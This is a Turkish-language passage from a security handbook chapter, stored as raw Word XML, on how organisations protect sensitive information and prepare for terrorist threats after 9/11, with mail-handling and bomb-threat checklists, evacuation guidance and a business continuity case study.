karşı korunmak için henüz bir dizi endüstri standardı bulunmamaktadır. ABD hükümetinden birçok mükemmel kaynak mevcuttu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ve etkin kılar. Askeri veya diğer devlet tesislerini korumak için tasarlanmış olsalar da, bu standartların birçoğu özel sektörde de başarıyla uygulanabilir. Bu noktada, bilgi güvenliği uygulayıcıları esas olarak standartları uygulamak için kendi inisiyatiflerine bırakılmıştır. Belki yakın gelecekte, daha fazla tehdit içeren bir dizi standart geliştirilecekt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u anda, İnternetten, ABD hükümetinden temin edilebilecek birçok mükemmel kaynak var. Bununla birlikte, bu yazının yazıldığı tarihte, ABD hükümeti, güvenlik nedenleriyle İnternet üzerinden kamuya hangi bilgilerin mevcut olacağı konusunda daha seçici hale geliyor. Bu kaynaklardan kaybolabilir oldukça mümkündü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ternet yakın gelecekte bir noktada. Bilgi güvenliği uygulayıcıları kaybolmadan önce bu değerli kaynakları bulmak isteyebilirler. İnternet kaynaklarının bir listesi Ek 163.3'te bulunabilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [].</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3 İnternet Kaynak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rofesyonel organizasyon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RI International - http://www.drii.org</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luslararası Güvenlik Yönetimi Derneği - http://www.ismanet.co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zm Araştırma Merkezi - http://www.terrorism.com/index.shtm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fosyssec.com’un fiziksel güvenlik kaynağı listesi - http://www.infosyssec.com/infosyssec/physfac1.ht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nfosyssec.com’un İş Sürekliliği Planlaması Kaynak Listesi - http://www.infosyssec.net/infosyssec/buscon1.ht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evlet kurum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lusal Altyapı Koruma Merkezi (NIPC) - http://www.nipc.gov</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ederal Soruşturma Bürosu (FBI) - http://www.fbi.gov</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ç Güvenlik Kritik Altyapı Güvence Ofisi (CIAO) - http://www.ciao.gov</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İç Güvenlik Ofisi - http://www.whitehouse.gov/homeland/</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BI’nın “Terörle Savaş” sayfası - http://www.fbi.gov/terrorinfo/terrorism.ht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nada Güvenlik İstihbarat Servisi (CSIS) Terörle Mücadele Sayfası - http://canada.gc.ca/wire/2001/09/110901-</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S_e.htm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lkol Bürosu, Tütün ve Ateşli Silahlar Bomba Tehdit Kontrol Listesi - http://www.atf.treas.gov/explarson/informatio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ombthreat / checklist.ht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skeri Ajans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vunma Bakanlığı - http://www.defenselink.mi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vunma Bakanlığı’nın “Amerika’yı Savunma” sitesi - http://www.defendamerica.mi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BD Ordusu Fiziksel Güvenlik Alanı El Kitabı - http://www.adtdl.army.mil/cgi-bin/atdl.dll / fm/3-19.30/toc.htm</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b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Önerilen Değişiklikleri Uygul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ine, özel sektör için gelişmiş fiziksel güvenlik için tek tip standartlar olmadığı için, fiziksel güvenliğimizi arttırmak için kendi cihazlarımıza bırakıldık. Fiziksel güvenliği artırmak için sınırsız bütçeye sahip olma ihtimalimiz olmadığı için, bilgi güvenliği uygulayıcıları bu kişilerin risklerini değerlendirmek zorunda kalacak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otansiyel terör tehdidi de dahil olmak üzere örgütleri değerlendirir ve değerlendirilen riske dayanarak önerilen değişiklikler yapar. İdeal olarak, bu değişiklikler mümkün olan en hızlı şekilde uygulan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perasyonel Güvenlik ile Hassas Bilgilerin Kontrolü</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PSEC)</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mdi başarıyla “vagonları daire içine aldık” ve tesislerimize fiziksel erişim kontrollerini iyileştirdik. Bir sonraki adım, hassas bilgilerimizi daha iyi kontrol etmektir. Ek 163.4'te gösterilen ünlü II. Dünya Savaşı güvenlik posterinin gösterdiği gibi, bilgilerin başarılı şekilde kontrolü savaşları kazanabilir veya kaybedebilir. Müttefik Enigma'yı ele geçir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freleme cihazı, II. Dünya Savaşı sırasında Almanlar için kritik bir darbe olduğunu kanıtladı. Müttefikler daha sonra kritik kodları çözebildi ve bu da onlara aşılmaz bir avantaj sağladı. Yine Körfez Savaşı sırasında, Müttefik Koalisyonunun sağladığı en büyük teknik avantaj, onlara hava üstünlüğüne çevrilmiş bilgi üstünlüğü ver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xml:space="preserve">Bu tarih dersleri, hassas bilgilerin zarar vermek isteyenlerin ellerinden uzak tutulmasının önemini göstermektedir. 11 Eylül'den bu yana, bu, erişimi olmayan herkesten hassas bilgileri </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tutmak anlamına geliyor. İlk önce, hangi bilgilerin hassas olduğunu tam olarak tanımlamamız gerekir. O zaman hassas bilgiyi en iyi nasıl kontrol edeceğimize karar vermeliyi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ssas bilgilerin tanımlanması. Hassas bilgiler kolayca, yetkisiz bir tarafın kullanımına açıksa, güvenlik açıklarını açığa çıkarabilecek ya da diğer bilgilerle birleştirilebilecek bilgiler olarak tanımlanabilir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bir kuruma karşı kullanılmak. Örneğin, halka açık bir Web sitesinde görünüşte masum olan bilgiler, o kurumu hedeflemek için yeterli bilgi içeren düşmanca bir taraf sağlayabilir. Gibi bilgiler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tesislerin adresleri, tesislerin haritaları, memur ve çalışan isimleri ile müşterilerin veya müşterilerin isimleri ve adresleri bir yol haritası oluşturmak için birleştirilebilir. Bu yol haritası potansiyelini söyleyebilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>terörist sadece örgütün nerede olduğu ve ne yaptığı değil, aynı zamanda örgütün bir parçası olan ve savunmasız olduğu yerler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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B24737B" wp14:editId="206F2BFF">
            <wp:extent cx="4314825" cy="3457575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="4130" name="Resim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14825" cy="3457575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A21B6C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SERGİ 163.4 II. Dünya Savaşı ünlü güvenlik post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ssas bilgilerin kontrol edilmesi. İhtiyatlı bilgi güvenliği uygulayıcıları önce kendilerini en savunmasız bırakan bilgi kaynağını kontrol etmek isteyeceklerdir. Güvenlik birkaç yöntem var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uygulayıcılar hassas bilgilerinin kontrolünü sağlamak için kullanabilirler: hassas bilgilerin Web sitelerinden ve kurumsal iletişimden kaldırılması; hassas bilgilerle çöpleri imha etmek; temiz bir masa politikasına sahip olmak; ve yüklenicinin / satıcının hassas bilgilere erişimini sınırla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lka açık web sitelerinden hassas bilgileri kaldırın. Fiziksel adreslerin, haritaların, görevlilerin / çalışanların adlarının vs. bu Web sitelerinden kaldırılması şiddetle tavsiye edilir. İkisi de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iteden tamamen kaldırıldı veya bu bilgilere erişimin doğrulandığı ve kaydedildiği sitenin güvenli bir bölümüne taşınd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17 Ocak 2002 tarihinde, Ulusal Altyapı Koruma Merkezi, NIPC Danışma Belgesi 02- 001: İnternet İçerik Danışma Belgesi: İstenmeyen Kitleyi Göz önünde bulundurarak yayımladı. İçin bkz. Ek 163.5</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anışma belgesinin yeniden yazdırılması. Bu danışma belgesi, halka açık İnternet sitelerinde neyin ve neyin yerleştirilmeyeceğine karar vermek için bir dizi standart olarak işlev görebilir. Bilgiyi Web sitelerinden kaldırma yönetimi ile ilgili sorunu gündeme getirirken, bilgi güvenliği uygulayıcısı danışmada yedi numaralı maddeyi tekrarlayan bir yanıt alabilir: “Bilgi, birçok yerde halka açık olduğundan, kaldırılması için çaba gösterilmeye değmez sitemizden.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 ne kadar bilgi başka yerlerde bulunsa da, teröristlerin onu bulması için en muhtemel ve en kolay yer hedef kurumun Web sitesindedir. Burası aynı zamanda ilk bakacakları yer. Sorumlu bilgi güvenliği uygulayıcıları veya bu konuda şirket memurları, düşmanlık sahibi kişilerin İnternet sitelerinden yararlı bilgiler edinmelerini mümkün olduğunca zorlaştır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kurumsal iletişimden hassas bilgileri kaldırın. Hiçbir kurumsal iletişim hassas bilgi içermemelidir. Bir kuruluşta zaten bir bilgi sınıflandırma yapısı varsa, bu güvenlik açığının önceden giderilmesi gerekir. Ancak, herhangi bir bilgi sınıflandırma yapısı mevcut değilse, bu böyle bir programın uygulanması için mükemmel bir gerekçedir. Ve böyle bir programla, belgeleri markalama ihtiyacı da var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ssas bilgileri içeren çöpleri parçalayın / imha edin. Çöp kutusundan kimin geçtiğini gerçekten biliyor mus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Janitorial ekibinizi tanıyor musunuz? Dumpster dalış, yaygın olarak uygulanan bir sosyal mühendislik yöntemidir. Parçalama, bu güvenlik açığını önlemenin mükemmel bir yoludur ve zaten yaygın şekilde uygulanmakta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çok kuruluş, daha sonra sözleşmeli parçalama şirketleri tarafından parçalanan hassas belgeleri toplamak için yerinde parçalayıcılara veya kutulara sahipt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miz bir masa politikası oluşturun. Masaüstünde gözetimsiz bırakılan bilgiler sosyal mühendislerin favorisidir. Çöp bidonuna dalmaktan daha kolaydır (temizleyici de!) Ve muhtemelen daha iyi sonuçlar verecekt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miz masanın tanımı değişebilse de, böyle bir politikanın amacı hassas bilgilerin masaüstünde gözetimsiz bırakılmamas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üklenici / satıcının hassas bilgilere erişimini sınırlandırın. Bu standart bir fiziksel güvenlik uygulamasıdır ancak OPSec kategorisinde özel olarak bahsedilmeyi hakediyor, çünkü müteahhit / satıcı erişimi üzerindeki kontrolleri uygulamak oldukça kolaydır. Özel bilgilere erişimi kısıtlamak da iyi bir uygulamadır.</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k: 11 Eylül 2001 1983'ten Sonra Tehdit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ek</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 163.6 Güvenli Posta İşleme Kontrol List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üpheli Paketler veya Post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ranacak şüpheli özellikler şunları içer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lışılmadık veya bilinmeyen bir menşe y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Dönüş adresi yo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şırı miktarda posta ücret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lağandışı veya olağandışı boyu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aket üzerindeki yağlı leke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 öğeye çıkıntı yapan veya ona bağlı teller veya tel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aket etiketinde yanlış yazı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arklı iade adresi ve posta damg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abancı stil el yazısı görünümü</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endine özgü koku (teröristler tarafından kullanılan birçok patlayıcı ayakkabı cilası veya badem gibi koku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ıradışı ağırlık veya hafifli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üzensiz denge veya şeki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Üstte, altta veya yanlarda yaylan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sla şüpheli bir ambalajın üzerine bant, ip veya diğer ambalajları kesmeyin veya şüpheli bir mektubu veya ambalajı suya batırmayın; Her iki hareket de patlayıcı bir cihazın patlamasına neden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üpheli bir pakete veya mektuba asla dokunmayın veya taşı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üpheli paketleri veya postaları derhal güvenlik görevlilerine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bina / ofis ziyaretçilerinin kimliğini doğrulayın. Birçok büyük kuruluş ve ofis binası tüm ziyaretçilerin kimliğini doğrulamaktadır. Bazı kuruluşlar ve binalar, giren herkes için kimliği kontrol ediyor. Bu mükemmel bir uygulamadır, çünkü yetkisiz erişim riskini büyük ölçüde azalt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lağandışı ziyaretçileri veya etkinlikleri kolluk kuvvetlerine (LEA) bildir. Şüpheli veya olağandışı şekilde davranan ziyaretçilerin, mümkünse güvenliği sağladıkları ve daha sonra kolluk kuvvetlerine bildirdikleri bildirilmelidir. Hızlı raporlama, istenmeyen etkinlikleri önley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üvenli posta işleme prosedürlerini uygulayın. Posta işleme prosedürleri, 2001 sonbaharında şarbon korkusu sırasında daha büyük önem kazanmıştır. Güvenli posta işleme prosedürlerinin bir listesi için bkz. Ek 163.6.</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zm Olayı İşleme Prosedürlerini Gel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üvenlik Çalışma Grub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çok kuruluş güvenlik çalışma grupları kurmuştur. Bu gruplar yönetim, bilgi güvenliği uygulayıcıları, diğer güvenlik uzmanları ve güvenlik ve tesis yönetimi çalışanlarından oluş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Grubun üyeleri ayrıca istihbarat / tehdit bilgisi almak için yerel, eyalet ve federal otoritelerle ve profesyonel kuruluşlarla ağ oluşturmada odak noktası olarak görev yapabilir. Grup, kuruluşun güvenlik duruşunu gözden geçirmek ve yükseltilmiş güvenlik prosedürlerini uygulamak için bir organ olarak hareket etmek için düzenli olarak toplan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yrıca güvenlik değerlendirmeleri de yapabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="206" w:name="_Toc7996894"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">13. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Terörizm Olayı Prosedürleri Oluşturma</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206"/>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lgisayar güvenlik olayları için olay müdahale planlarının ve prosedürlerinin olması önemli olduğu gibi, terör tehditleri veya olayları için olay müdahale planlarının ve prosedürlerinin bulunması da şiddetle tavsiye ed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terör olayı tepkisinin ayrılmaz bir parçası bomba tehditleri ve diğer terörist tehditler için kontrol listeleri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kontrol listeleri, bireye tehdit çağrısı yapmasını isteyen çok sayıda soru içermelidir: bomba nerede, ne zaman patlayacak, neye benziyor, vb. Kontrol listeleri ayrıca arayan kişinin sesinin tanımlarını doldurmak için boşluklar içermelidir. - yabancı aksan, erkek veya kadın, ses tonu, arka plan gürültüsü vb. Kontrol listeleri tüm telefonların yakınında veya en azından şirket telefon rehberlerinde bulun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çok federal ve eyalet kurumunun genel halk için bu tür kontrol listeleri vardır. Alkol Bürosu, Tütün ve Ateşli Silahlar, pek çok kurum tarafından kullanılan ve Ek 163.7'de gösterilen mükemmel bir kontrol listesine sahipt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ine, bilgisayar olayı müdahale ekiplerinde olduğu gibi, eğitim oldukça önemlidir. Çalışanların bu tür yüksek stresli durumlarda nasıl cevap vereceğini bilmeleri gerekir. Tehdit altındaki telefon görüşmelerine nasıl cevap verileceği ve kontrol listesinin doldurulması konusunda tekrarlanan eğitimler risklerin azalmasına katkıda bulunu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Sİ 163.7 BANYO Bombası Tehdit Kontrol List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TF BOMBASI TEHLİKE KONTROL LİST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am görüşme sür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_______________________________________________________</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rayanın tam kelime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_______________________________________________________</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ORULAN SORU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1. Bomba ne zaman patlayac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2. Bomba nered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3. Neye benzi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4. Ne tür bir bomb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5. Patlamasına neden olacak ne v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6. Bombayı yerleştirdiniz m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7. Nede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8. Nereden arıyors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9. Adresiniz ne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10. İsmin ne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CALLER’IN SES (dair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kin Yavaş Ağlama Slurred</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tutter Derin Gürültülü Kırı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ıkırdayan Accent Angry Hızl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tresli Nazal Lisp Heyecanl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izli Samimi Gıcırtılı Norma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s tanıdık geliyorsa, kime benziyord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arka plan gürültüsü var mıyd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yarı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ağrı alan ki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lefon numarası araması şu adresten alınd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arih:</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ramayı hemen şuna bil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omba olay planına bakını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üvenlik Uygulama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urumsal güvenlik personelini veya komitelerini dahil etmek için mükemmel bir fırsat. Bazı uygulama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nları dahil etme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 tahliye prosedürlerini gözden geçirin. Bu, ihtiyaç olması halinde binaların boşaltılması için mevcut ve en iyi yöntemi sağlayacaktır. Ayrıca, birincil yolun kullanılamaması durumunda ikincil tahliye yollarını plan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 tahliye tatbikatları yapın. Yangın tatbikatları gibi periyodik bina tahliye tatbikatları, kaçış yolları konusunda eğitim ve tanıdıklık sağlar. Acil bir durumda, eğitime cevap vermek çok daha iyidir. Bun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üm vardiyalarda önceden bildirimde bulunulmadan yapılmalıdır. Matkaplar her zaman aynı olma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eriyodik olarak, tahliyeleri rotalarını değiştirmeye zorlayarak bir kaçış rotasını engelleyerek tatbikatı değ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Terörizm olayı tatbikatları yapmak. Çeşitli terör senaryolarına cevap vermek gibi diğer tatbikatlar, böyle bir durumda hızlı ve güvenli bir şekilde yanıt vermek için gerekli eğitimi sağlamada yararlı o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oruyucu ekipman düzenleyin. Dünya Ticaret Merkezi felaketinden kurtulanların birçoğu duman soluması, göz yaralanmaları vb. Yaşadı. Acil durumlarda bu tür yaralanmalardan kaçını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kipman, kask, toz maskesi, gözlük, el feneri, eldiven vb. çalışanlara verilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="207" w:name="_Toc7996895"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">13.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bina Güvenliği Prosedürleri</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207"/>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rarlı bir terörist çoğu ofis binasına nüfuz edebilir. Bununla birlikte, koruyucuların ve fiziksel güvenlik cihazlarının (örneğin dış lambalar, kilitler, aynalar, görsel cihazlar) varlığı ve kullanımı önemli bir psikolojik caydırıcıdır. Teröristler, daha az korunanlar için riskli hedeflerden kaçma eğilimindedir. Teröristler riski kabul etmeye karar verirse, güvenlik önlemleri başarı şanslarını azaltabilir. Elbette, teröristler çabalarında ölmeye istekli olursa, başarı şansları artar ve onları engelleme çabaları çok daha karmaşık ve pahalıdır. Kurumsal ve devlet yöneticileri kapsamlı bina güvenliği programları geliştirmeli ve sık sı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tkili bir bina güvenliği programının temelini oluşturan güvenlik anketleri. Bu araştırmalar, güvenlik koşullarının ve sorunlarının, mevcut kaynakların ve potansiyel güvenlik politikasının doğru bir şekilde değerlendirilmesi için temel bilgiler üretir. Karmaşık bir yapıdaki birçok yönden yalnızca biri olan güvenlik politikaları, yangın güvenliği, normal polis prosedürleri, çalışma ortamı ve iş işlemleri gibi diğer önemli alanlarla entegre edilmelidir. Ek 163.8'de bulunan bina güvenlik kontrol listesi, bina güvenlik prosedürleri geliştirilirken rehberlik ed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alışanlar İçin Terörle Mücadele Prosedür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le Mücadele prosedürleri, terör saldırılarına karşı kırılganlığı azaltmak için kullanılan savunma önlemleri olarak tanımlan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savunma önlemleri veya prosedürleri, ABD hükümeti tarafından oluşturulmuş olmasına rağmen, kesinlikle yüksek terör tehdidi koşullarında yaşayanlar için geçerlidir. Bazı güvenlik uygulayıcıları için, bu prosedürlerin çoğu paranoya eşiğinde görünebilir; bununla birlikte, iki niyetle sunulurlar: (1) var olan çeşitli tehlikeleri ve bunlardan kaçınma yöntemlerini göstermek ve (2) okuyucuların hangi prosedürlerin kullanılacağını kendileri belirleyebilmelerini sağla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rosedürlerin çoğu basitçe sağduyulu. Diğerleri ise genellikle yalnızca yüksek terör tehdidi ortamlarında yaşayan ve çalışanlar tarafından bilinen prosedürlerdir. Personel terörle mücadele kontrol listesi için bkz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="208" w:name="_Toc7996896"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">14. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11 Eylül'den Alınan Dersler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FB4935" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FB4935" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB4935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Planımız işe yaradı ve yapması gerekeni yaptı. Çalışanlarımız güvenle tahliye edildi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FB4935" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB4935">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Paul Honey</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Merrill Lynch Küresel Acil Durum Planlama Direktörü</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ok iyi hazırlanmış organizasyonlar 11 Eylül felaketini havaya kaldırdı. Ancak, hazırlıksız yakalanan birçok işletme de vardı; Bunların çoğu artık yok. ABD ve dünyanın dört bir yanından gelen organizasyonlar, o kader günü öğrenilen derslerden yararlanıyor. Bir büyük ve oldukça tanınmış</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yi hazırlanmış ve hayatta kalan organizasyon ise Merrill Lynch oldu. Merrill Lynch'in küresel acil durum planlama direktörü Paul Honey, 11 Eylül sabahı işe geldiğinde, yıkılan Dünya Ticaret Merkezinin felaketiyle karşılaştı. Bal daha sonra, acil durum planlama personelinin işinin zor olduğu şirketin acil komuta merkezlerinden birine gitt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elaketten bir saat sonra, kriz yönetimi ekibi kilit temsilcilerle iletişim kurmuştu ve acil durum prosedürleri yolunda gidiyord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oney’in ekibi bir gün içinde kritik operasyonların sürdürülmesini ve bir hafta içinde 8000 çalışanın taşınmasını kolaylaştırdı. Bu çaba, iyi belgelenmiş ve sağlam bir iş sürekliliği programının etkinleştirilmesini, muazzam bir iletişim çabasını ve çok sayıda ekip çalışmasını gerektiriyordu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="209" w:name="_Toc7996897"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">15. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İş Sürekliliği Planları</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209"/>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al, Merrill Lynch’in tüm işletmeleri için iş sürekliliği planlama sorumluluğuna sahiptir. İşletmenin iş sürekliliği planını veya BCP'yi takip ettiğini doğrulayan 19 kişilik bir ekibin yöneticisidir. Teknoloji kurtarma planlamasından sorumlu olmayan ekibi, ve planları yazmazlar. Program yönetiminde konu uzmanlarıdır ve tam bir BCP programı yaşam döngüsü boyunca standartları belirlerler. Planlama, programın kapsamlı olması nedeniyle şirket içinde birçok farklı departmanı içerir. Her işletme ve destek grubu (yani, ticaret katı, işlemler, finans vb.), O alandan sorumlu bir planlama yöneticisi at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XHIBIT 163.8 Yapı Güvenliği Kontrol List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ffice erişilebilirli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rörist hedef olma olasılığı en yüksek binalar halka doğrudan erişilemez ol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önetici ofisleri zemin katta bulunma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iriş kapısını, tarama personelinden ve kapıdan geçen nesnelerden sorumlu kişinin görüşüne yerle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lektromanyetik bir kapı kilidi takılarak kapılar uzaktan kontrol edil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n etkili 